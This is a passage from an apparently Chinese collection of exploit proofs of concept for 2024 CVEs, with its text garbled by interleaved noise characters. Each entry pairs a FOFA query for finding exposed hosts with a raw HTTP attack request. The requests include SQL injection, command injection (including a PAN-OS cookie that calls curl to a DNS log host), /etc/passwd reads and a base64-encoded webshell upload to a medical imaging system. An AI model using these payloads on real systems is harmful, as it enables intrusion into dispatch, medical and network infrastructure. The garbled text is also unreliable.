- \4 |8 I+ x" {1 Y% i; u7 Y+ F0 jUpgrade-Insecure-Requests: 1
1 b2 v2 p7 G4 q8 A# E5 R+ n
; d% r3 e) _% k' a7 |- K. D; a$ P. I9 X) Q9 j
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入8 U" t+ S4 l+ ]1 O
CVE-2024-2621
7 d* K6 F) W/ b9 [( Q% rFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 \* t  m2 ]: Q; V* o
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
$ O* t, S) _1 q) W( HHost: x.x.x.x- M: T" U+ b* |$ h6 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) r0 j0 E, m+ _# b. I, u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: Y0 m5 K% A: X0 F; {0 S! |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 h! r3 q! _* j
Accept-Encoding: gzip, deflate, br
$ Y$ q6 U  i  M. E+ HConnection: close. [* m, b3 ~# G1 \' y& e
Upgrade-Insecure-Requests: 1
' _7 q2 T9 G% S) o4 K* C
3 H6 C! f8 m0 Q8 @$ d$ g, r' K9 @* ~1 ~, {/ C) G: k
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
* h/ S& N" n7 F% sCVE-2024-2622
8 i3 ^0 q& G' X" P" `$ W) S9 nFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& U( z' w. z5 oGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1+ i  z" F) H% f4 G& ?" v% w
Host: x.x.x.x& p! q" S# H1 L" V: U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
  ]9 [& c6 W- @1 z  S+ n5 v: M* }4 b! YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* g/ @9 l$ }) o& X8 k0 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% ~5 k& s1 K2 Y5 y, L+ v9 c- eAccept-Encoding: gzip, deflate, br
# q  c' a& u4 X- sConnection: close
  a! V7 k  G& l% g% I6 c( I# KCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk7 j/ [! B, e. u3 @; e
Upgrade-Insecure-Requests: 1; T6 b$ ]/ c- u9 Z  t' c5 G
( s/ F/ v, R6 _* [3 ^! ]
+ p5 g* r  k2 ]/ Z9 b
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入% g" C' b! N# a2 t5 L3 u
CVE-2024-2566* ^+ {, d' O. V. Y7 I
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& {. [; u9 i# nGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1+ d; J" b! d5 k4 P2 S
Host: x.x.x.x  {- U# Q! X- K& F( E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 a4 m. h5 m" f/ H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) R! q" j+ ?0 _% u: y3 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* v. l1 S: @9 F" s. P& ?: G" @$ V! SAccept-Encoding: gzip, deflate, br
6 j) ?& O( Y; v5 P9 @Connection: close
% M+ C4 S1 {6 V: P# C* vCookie: authcode=h8g9  a! H: d3 }' d* c
Upgrade-Insecure-Requests: 1
5 k; S; T/ k* ?9 V3 ~% q
* x" U5 ]  a. v: f' U  W- n0 u
3 U8 b* m; u* [9 Z& t4 I# `141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入8 d# B3 S1 ]  ^. F8 I: P; q5 `
FOFA:body="指挥调度管理平台"
9 U: Z/ h7 Z- L8 b3 k9 dPOST /app/ext/ajax_users.php HTTP/1.1: l; W1 \/ U  a0 J7 X! d
Host: your-ip. g, P& O6 Z8 r1 |! w; m: `+ \
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
* V2 z5 X% D# [Content-Type: application/x-www-form-urlencoded; i  {; }" b" K6 @' Z

: {) W' |. w, \/ V8 w! F6 n% d' F8 h
+ z9 s7 n" N) H6 ^/ @dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
( u- z' p- y2 j( V3 Z& j2 U$ K  N' h6 C- G3 e, o" G

8 t, J$ h4 j6 y8 M+ W% F5 n142. CMSV6车辆监控平台系统中存在弱密码
3 v9 d1 X. L# w9 xCVE-2024-29666
/ a3 W6 I' b: M! V. bFOFA:body="/808gps/"' X. B' I; }  q# f
admin/admin  R4 {- A. m% g
143. Netis WF2780 v2.1.40144 远程命令执行  d7 C# V% {% o
CVE-2024-25850( }) F5 I, o) ^" X3 }1 l9 E. ~
FOFA:title='AP setup' && header='netis'8 q" n3 k1 o  z) b) _: H9 a: A
PAYLOAD
* u2 N, |7 o( ~  m, @9 s0 Z5 k3 ~- l8 @7 Z- g4 T
144. D-Link nas_sharing.cgi 命令注入
. R' E* p, u% FFOFA:app="D_Link-DNS-ShareCenter"
4 M' f; m. A6 x- Isystem参数用于传要执行的命令* ?' |! p3 z( _
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1% V, h8 O( b5 w8 [. f, s* G
Host: x.x.x.x! i% @! w% P% b+ q( X" {& ?/ E# T
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
, V9 J. J$ A+ ?" [0 J) d3 _$ h7 aConnection: close
, L3 _3 a) P! U# q7 B1 D0 gAccept: */*% L* G+ ~) x5 S) q0 t
Accept-Language: en/ y& {3 z; _- N: {
Accept-Encoding: gzip0 _6 z" l, @7 V* n; @

9 K) [+ Z: z& ~8 C& W' q1 Z$ t/ z9 S! Z/ n2 M! k
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
5 Y* h! j7 K# `4 R2 a1 yCVE-2024-34002 O8 o  W, I! [4 m3 E5 a. |7 }& z8 v7 E
FOFA:icon_hash="-631559155"
% ]' h* Z" b4 Y. v! Z. vGET /global-protect/login.esp HTTP/1.1
1 ]) x( P# h8 _- l. DHost: 192.168.30.112:1005
( H6 Z5 x* `, }0 h; f& nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
+ k" X: W  |, X4 e+ I; ]Connection: close
+ Q" x2 I' u7 R  p3 QCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;4 g9 ^3 {  t# v8 U* J- ]
Accept-Encoding: gzip
5 r. {" n8 s3 }3 o* g
$ w& b, Z' }  j; K
0 h3 R+ g1 X' M: O1 b, P* \' ^5 i146. MajorDoMo thumb.php 未授权远程代码执行
3 d3 u5 M% L. PCNVD-2024-02175. I, g$ s* \4 B: C6 i/ H# I# F
FOFA:app="MajordomoSL"$ U5 X7 e6 \& S8 @+ R
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
; o+ O" K/ n% x. @Host: x.x.x.x0 b  c$ P- ~+ g6 \/ k9 e' z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
$ w- F) O9 u$ o. `5 G* GAccept-Charset: utf-8
7 F8 A( o" V- U% B) }' X/ i7 x/ hAccept-Encoding: gzip, deflate
9 L+ W% T- Y  H) d! ~Connection: close
8 }, V) I3 s% B- ^1 e& H/ Z; F7 _% K) q
+ L* T! t. J9 r8 m' I" B8 I
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
  N1 Y4 @; q' b- J6 n/ OCVE-2024-32399
9 H( [5 u( I* v" r/ |, XFOFA:body="RaidenMAILD"0 {& Q# i4 {9 E& R* [) |
GET /webeditor/../../../windows/win.ini HTTP/1.1) d: V  d, K. P2 l) `
Host: 127.0.0.1:81" w5 o* N1 N3 V' s" y" p. W) h
Cache-Control: max-age=06 m' m  A: \: e4 t! _
Connection: close
6 S% f% l  g- f& T2 W
- u+ ]8 K; ^- P2 v0 J( j. C4 B9 v0 Y! S( d
148. CrushFTP 认证绕过模板注入
% W# w; A8 u' n" _3 i: |CVE-2024-4040
. a" [' _& `# C1 @FOFA:body="CrushFTP"  o, H9 `  H8 b. F
PAYLOAD
( y: }" n8 T. o6 f# z
& r& E9 [6 n" q: @) V& w149. AJ-Report开源数据大屏存在远程命令执行  D6 b" z: J# f
FOFA:title="AJ-Report"
' i+ H& I/ J- L. R! b
' Q) _( f* D/ f3 s$ s# j" qPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
8 U( h5 g( @! ?( I3 l# N0 EHost: x.x.x.x
; Y5 k6 h; v+ _$ R2 ~- e& L1 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
% @# Q) `  w( KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- k  L* C4 M9 {& FAccept-Encoding: gzip, deflate, br7 J1 G+ ], F  f7 |# E$ H0 H, _
Accept-Language: zh-CN,zh;q=0.9
, x! k9 n" N4 H( R, T8 QContent-Type: application/json;charset=UTF-8# o9 y$ `) |9 A3 u/ m
Connection: close
/ X' F" F5 Z) q2 S1 S) S5 ^! t3 L! D$ Y' j# R, d
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}. P' |& n7 M% t+ w2 Q$ S

5 ^' D/ p0 N3 `8 }150. AJ-Report 1.4.0 认证绕过与远程代码执行
8 g; f. B/ c; I/ x0 V6 Y) mFOFA:title="AJ-Report"
: z! s8 K8 Z" A4 cPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' A. ?1 w+ l  {- G% V* ^4 uHost: x.x.x.x
% R. R. l5 S. U4 u3 R& t4 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 e. a) D5 }9 f* C+ d% `: @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# C$ c. _! i; |Accept-Encoding: gzip, deflate, br& J6 B: U, x9 e$ i- C! \
Accept-Language: zh-CN,zh;q=0.9# O+ m3 _& f8 o, I
Content-Type: application/json;charset=UTF-8
* r1 D! g1 S" B0 F$ iConnection: close: @: K* a' Q8 r% @. R& S# i/ B- _
Content-Length: 339
% U0 A; g4 h- I8 J1 u0 Z+ J( t
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
- N$ H0 [" L  K5 W# w- L  m8 m3 j
1 R) i' W7 Y. d$ F: Q
; u* j, s7 f+ E# t3 \$ I) b151. AJ-Report 1.4.1 pageList sql注入
9 v) {% V+ E2 ~FOFA:title="AJ-Report"* l) ~8 N' z! Q: K6 Z& a
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
/ R" ]# \8 z- h; SHost: x.x.x.x
; I* d6 b- F8 D5 i- y: k; zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 H9 ?! f, a- C
Connection: close
5 x' l( Q; M% Z: P2 NAccept-Encoding: gzip
: j* r$ H- Y% J4 n: R( C9 I1 ]6 w! d; \! X* `+ L- y" H4 X
" c" d/ n) {$ {) I# M9 K1 F
152. Progress Kemp LoadMaster 远程命令执行
' ?& e4 @$ z9 G& _7 QCVE-2024-1212
" r4 ?  y7 l' ?1 k1 cLoadMaster <= 7.2.59.2 (GA)
7 A9 r6 o5 A* ~3 @9 QLoadMaster<=7.2.54.8 (LTSF)
  |7 W7 g9 y/ m& r/ nLoadMaster <= 7.2.48.10 (LTS)3 C8 i* c! d. J: Z
FOFA:body="LoadMaster"( O' K8 Y/ m$ Q$ ~
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码0 I# h1 G1 V: r) X
GET /access/set?param=enableapi&value=1 HTTP/1.1
2 F$ \4 ~: e+ }) m6 f6 UHost: x.x.x.x+ h& F9 k) L- ?3 \7 L8 ^7 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
5 q+ D) X1 ?, u4 k' WConnection: close1 ^8 T" G- f" }1 L% Z9 S
Accept: */*
/ W8 V' |3 Y: M+ A" W5 AAccept-Language: en
& X& `3 j  R; XAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=  H% K- s) j& n
Accept-Encoding: gzip9 y* Q' @7 O4 g; ?- B! q3 ]

4 H) k) I( `  u& o
  m5 S& f& o. m3 O1 r153. gradio任意文件读取3 C6 w( ~: K" `/ G# O% `
CVE-2024-1561FOFA:body="__gradio_mode__"7 K0 M$ I0 r# p+ @
第一步,请求/config文件获取componets的id
/ j$ s! D( n% ^( H  C9 g. Mhttp://x.x.x.x/config# h/ [/ j0 F$ p% C

3 D+ v1 k% L' e" Q5 y" d, M2 o7 d2 F- B- s  s
第二步,将/etc/passwd的内容写入到一个临时文件  Y7 ?4 N/ b/ H* t4 M
POST /component_server HTTP/1.1) I3 ^$ c4 {7 {0 g. P0 M
Host: x.x.x.x2 W( r+ _9 ~4 n! V  J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
# O$ l8 M6 W5 Z( D4 A1 ^Connection: close! p9 d" R* B- s. {7 ^6 a% l
Content-Length: 115
( C6 F2 G! U7 O* z  [. g- a6 @# KContent-Type: application/json
/ D4 ~* g0 Q4 b; N: t% N5 PAccept-Encoding: gzip
% x$ h! k4 K7 t, }, j2 L& W' H# I% d
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}8 ]$ M, d+ N$ k1 n1 f- i

. \$ P3 S) ?5 A, x2 a* J) c  p/ `0 \& `  E
第三步访问
8 o5 [& r- ~5 s! Ghttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd0 X' F9 c. F' u0 `7 x. ]

! B1 M: t, H6 N1 I5 d: L- ^7 K8 v8 {4 E- _5 W: T
154. 天维尔消防救援作战调度平台 SQL注入
% T2 [  |# {' DCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
/ d1 E! |1 b- a" C8 RPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
; W1 N5 y; l2 m8 O5 x/ O8 _2 J5 wHost: x.x.x.x! _4 Q& m2 x# `. _- B* ?! g
Content-Length: 106
' @1 H! i" q! ~, `5 N) ^Cache-Control: max-age=0
- c) O3 i' Y: ]* F. p! ~Upgrade-Insecure-Requests: 1
6 L( d" ]; `) d; a! kOrigin: http://x.x.x.x
( l! t6 O8 E5 e* G. ?Content-Type: application/json
! Q, H6 O' h, v) j" c. V5 K# s" hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.361 z+ D2 A% M7 ~3 y9 K& G  t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 R% k7 U( m0 P9 XReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
8 w1 T; X: h" V4 l5 E  _) IAccept-Encoding: gzip, deflate
( e# w# h# L, p( v( M0 Z( T$ aAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
3 c5 V* M" Z, T  b% J( sConnection: close0 W% S2 F. X& p) z* ~: @
, J- V, l3 J1 [! V4 s( Z
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}3 R- i! R5 ^4 V; W* c( [) N

& i9 ]' c+ d  l1 g4 A* X1 k$ S* f
155. 六零导航页 file.php 任意文件上传
  t  z/ r' j( f( b5 H7 W" J- _3 WCVE-2024-34982
& }' u% A$ |" n7 p" h+ x7 d; U% y) V; kFOFA:title=="上网导航 - LyLme Spage"
0 |. V. }' F, \5 DPOST /include/file.php HTTP/1.16 m$ `% m( A1 ~
Host: x.x.x.x
& w7 U2 h* c) }( r5 ?5 ]& KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
4 q: |" H* h: D, K" X2 z" [3 ~Connection: close
" J  B9 X, M0 WContent-Length: 232
6 l+ b( v- @1 HAccept: application/json, text/javascript, */*; q=0.017 N. N7 ?3 V" Q+ b$ t6 `9 g, U2 M8 g
Accept-Encoding: gzip, deflate, br
6 w& {. N+ z% |2 R* }6 ?& @* DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; ~4 {2 R4 _9 K5 l4 t( P8 BContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f& ]- u# C7 x2 u
X-Requested-With: XMLHttpRequest0 c, C; O. g- S8 r
* y+ {1 ^, k/ i4 R$ I! a
-----------------------------qttl7vemrsold314zg0f
4 N2 T( Z) E) e) D& O9 sContent-Disposition: form-data; name="file"; filename="test.php"$ Z  {5 h; i) N4 W# d+ E& E( k/ E
Content-Type: image/png/ g- F( @; ]6 R& m& `/ A8 U4 p
. ~. L' w* h6 P: _' G( z8 b
<?php phpinfo();unlink(__FILE__);?>
# ]4 M0 \6 `9 @2 O& ?3 [+ l-----------------------------qttl7vemrsold314zg0f--; q. G! x$ U" ~, Z* h: D$ S) k# I

6 y/ z; _0 X% T5 W4 h, d+ H/ ^, V0 c6 F1 `
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
8 P9 V& _7 O5 o+ g( o' x% ~/ j8 c: j5 ^( G3 [8 p5 j. b
156. TBK DVR-4104/DVR-4216 操作系统命令注入3 G! u# F- a8 g) [5 f3 b
CVE-2024-3721
% c# G! M/ Z+ AFOFA:"Location: /login.rsp"  I0 L% X! T& R  L# q  j
·TBK DVR-4104
" [: k1 J0 Y" ~# g; I·TBK DVR-4216
, X" ~4 ~" l. @/ }0 |* ncurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
6 W$ }0 x# ?- A, V2 V6 N
/ k4 \/ T7 Q: C7 D* a6 H6 y2 x: f) ~4 f+ Z
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1& b3 Z. [$ |( J! F
Host: x.x.x.x$ s8 B9 F( D! T1 E+ d
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 A) e5 q3 O9 Z9 `
Connection: close6 v1 C- A% a- A
Content-Length: 0
3 ^1 V2 N* S+ L6 V2 MCookie: uid=1
5 q6 K" y8 b2 q2 |: E- XAccept-Encoding: gzip
8 h8 w, |# _* X# V0 k5 E* I. ]" e" g/ H4 y4 e. d1 g
* M* O% V% F1 P! L. O; d- a2 x
157. 美特CRM upload.jsp 任意文件上传5 m" j5 D) P! ~/ V3 ^2 @3 l% q5 X
CNVD-2023-06971
; t6 I7 V, X' Z$ `5 WFOFA:body="/common/scripts/basic.js"
; a3 D$ m. C& D7 a: @POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
3 p, I# i* o- m# a- v, GHost: x.x.x.x
2 R9 |* J0 G0 h: C5 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
" _! o: P7 S: jContent-Length: 7098 A) n& D- e5 ^0 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  {7 w0 K+ U# h: @7 T6 dAccept-Encoding: gzip, deflate7 j3 B% X3 Z5 ?, p; ^4 `# D
Accept-Language: zh-CN,zh;q=0.95 k. @1 B$ L9 C' \) [; V2 o
Cache-Control: max-age=0. x0 z# w2 q8 K! i0 p5 s/ Y. o
Connection: close
# N" D) N; [' h4 _  E, UContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN$ q% B) v: k0 P7 b2 p
Upgrade-Insecure-Requests: 1; x/ g$ c+ X* x- l
9 i7 q' ~, H- q! w3 F/ N+ v, r
------WebKitFormBoundary1imovELzPsfzp5dN
$ a; n6 d! h4 ]  g8 Q- x# ?4 E3 cContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"+ w# I1 B" k  I  X
Content-Type: application/octet-stream# @- x0 r& v0 C$ V2 n$ |# U9 G& ?

& E+ c0 s0 z! s  l, R9 Z4 `8 Fnyhelxrutzwhrsvsrafb
% @- y3 s- n2 w# j) O------WebKitFormBoundary1imovELzPsfzp5dN
' K6 F( I; P4 ?. c( jContent-Disposition: form-data; name="key"
# d- o+ T6 C( e  M  W  p$ X
4 j) E- Z7 x6 A9 h& Onull, C3 s1 `2 t3 L- J5 @
------WebKitFormBoundary1imovELzPsfzp5dN
" @% ]% K. }' a, r& WContent-Disposition: form-data; name="form"0 L( |: d, k4 Q2 F, w; y

4 ]7 n" W# _  [null
% C8 v' q/ d5 O; _/ ~. k6 d------WebKitFormBoundary1imovELzPsfzp5dN
* H, L2 p& H* ]6 @Content-Disposition: form-data; name="field"
/ y# V7 W& L8 @0 u+ a5 |% X. d* J0 I  t- e
null
3 U+ E8 a) {1 Z0 H5 y------WebKitFormBoundary1imovELzPsfzp5dN
. N" R, e9 S$ W* S5 K9 |Content-Disposition: form-data; name="filetitile"4 u+ R' g  V( A8 ^" [3 k9 v: t1 p
8 M5 ~) _9 x6 S
null
1 T( r& L, C$ w; i+ [0 E; i, p% s! G------WebKitFormBoundary1imovELzPsfzp5dN
: s1 `4 i5 P! ^2 zContent-Disposition: form-data; name="filefolder"
% w" M6 O! V0 I5 V4 Z2 p& W# D2 K1 O/ t. U
null
" G) w4 {' P$ P5 i& a" s------WebKitFormBoundary1imovELzPsfzp5dN--
. P: f1 c; w0 L% e: R3 D* g" @% B2 x
' c+ T' B* ^% b, U% a
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
# |# `4 U7 n3 |: t
3 Z8 Y! ~  I  ~( W' z158. Mura-CMS-processAsyncObject存在SQL注入" s* X; Q# x, h8 h: @2 l  @: z
CVE-2024-32640+ L2 d( A% R% X* i" w$ f' G
FOFA:"Generator: Masa CMS"* }& j* v9 J" J8 H' a
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.12 J+ }) s/ {) k7 K9 M/ H2 z
Host: {{Hostname}}
4 O; V1 h4 x, }' L0 ~6 a/ N2 HContent-Type: application/x-www-form-urlencoded
' K, K  a7 _/ u* Z2 r2 e0 e- P8 @, o$ A  g% v/ A. D& G/ h
object=displayregion&contenthistid=x\'&previewid=18 U6 u  b- p- ~. p  J% v

& h# l% S! G- b, a, l# |( h7 V; E/ B( Y1 o; o; K" W
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传7 b* x* i9 B  l/ e- ?# ^, a- Q
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928"), r# p4 K+ Q" R* G! ^6 v' J% g
POST /webservices/WebJobUpload.asmx HTTP/1.1
: f! B. s+ q% ?! DHost: x.x.x.x
0 }3 P+ r; o. _: f: E9 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
0 Q, s/ J  e, @" P- _Content-Length: 1080
/ H1 L5 _+ [1 y% Q+ WAccept-Encoding: gzip, deflate0 z9 Q: d" u* G$ y
Connection: close
" f! |/ R5 v5 ^6 J$ xContent-Type: text/xml; charset=utf-8
" r( `6 Y4 q8 G6 `4 \8 F4 FSoapaction: "http://rainier/jobUpload"
0 T/ Q  V! Z" o5 n6 N( a! d% R8 x; X! P# Z! s, x8 o+ E
<?xml version="1.0" encoding="utf-8"?>
  p9 D" J& E" i0 q4 k<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">1 c$ J) P; K3 }- `
<soap:Body>7 H9 D' u" y8 E" \! Q2 y
<jobUpload xmlns="http://rainier">; R7 n( k$ L$ N- m  A
<vcode>1</vcode>& a, j( s6 H& f% }: |
<subFolder></subFolder>1 Z) ]' @6 o% s9 V0 y( q
<fileName>abcrce.asmx</fileName>
/ R! ~* {1 {5 T3 y# }<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>" Q, c6 B- m4 Z& |+ v
</jobUpload>  {& X  N/ B/ l. c8 H5 D- t0 \( z
</soap:Body>
4 Y/ E6 r2 j$ \. I' Y</soap:Envelope>  {2 D: v! p6 E# ?4 a+ g

$ _0 @- v4 f+ i) Q8 K* E! H
* a$ W8 G5 f6 b% Z0 o8 G/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
- e) R$ f: p9 Y4 m4 g5 J. p3 t
) R! e9 |% Z+ z' ]
3 X2 K3 E3 z4 D+ Q160. Sonatype Nexus Repository 3目录遍历与文件读取( o0 g! C4 v5 I4 c+ ~8 I3 y
CVE-2024-4956
) c+ _$ D% d- `! ^( iFOFA:title="Nexus Repository Manager"- W7 u$ y3 B# p& I  W+ w1 R# H8 U) E
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.10 `0 ]! w$ c% V1 y! r, u) F+ m! e) w
Host: x.x.x.x0 ~* t8 K) `* J9 N" x1 p7 S
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0/ J* s! R1 J+ z# {
Connection: close6 u3 z8 M1 s4 ~. C: Q. p
Accept: */*7 x" e# D' }1 x: a( u
